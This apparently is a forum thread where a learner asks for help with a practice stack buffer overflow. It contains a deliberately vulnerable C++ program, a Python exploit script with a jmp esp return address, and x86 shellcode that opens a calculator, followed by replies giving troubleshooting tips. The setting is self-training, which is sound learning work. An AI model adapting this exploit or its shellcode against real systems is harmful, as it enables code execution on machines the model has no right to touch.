Buffer overflows

I am in the process of writing my first ever buffer overflow exploit for training purposes but I can’t seem to figure it out and my exploits only crash with out any useful output so I am asking for your help.

// the compiled executable is called exec.exe
#include <iostream>
using namespace std;
int main() 
{
     char buff[256];
     cin >> buff;
     cout << buff;
     return 0;
}

this code takes a user input and writes it to the buffer allocated by the program as far as I know,
now I figured out the offset to be 268 that’s 256 +12, using Immunity debugger I found to jmp esp addresses and tried using them as the EIP (return address in the exploit code )

from  subprocess import *
import struct 
p = Popen(['exec.exe'],stdout=PIPE,stdin=PIPE)
EIP = struct.pack("I", 0x6eb51e62)
pad = b"\x42"*145
shellcode = b"\x90\x90\x90\x90\x90\x90\x90\x31\xdb\x64\x8b\x7b\x30\x8b\x7f\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b\x77\x20\x8b\x3f\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x89\xdd\x8b\x34\xaf\x01\xc6\x45\x81\x3e\x43\x72\x65\x61\x75\xf2\x81\x7e\x08\x6f\x63\x65\x73\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9\xb1\xff\x53\xe2\xfd\x68\x63\x61\x6c\x63\x89\xe2\x52\x52\x53\x53\x53\x53\x53\x53\x52\x53\xff\xd7"
out_put = pad+EIP+shellcode
p.communicate(out_put)

the length of the out_put is 268
this shellcode opens a calculator
I tried to increase the padding but was not successful

2 Likes

Hello, first of all, please even is the output seems not useful share it.
I recommend you to take a look at this post


Maybe can help you, also try to use examples codes of buffer overflow before creating your own one.

Hope this helps you :smiley:

1 Like

Apparently cin terminates on spaces which also seems to appear in your input. Make sure you check for other bad characters.

Never seen people starting exploit dev using C++.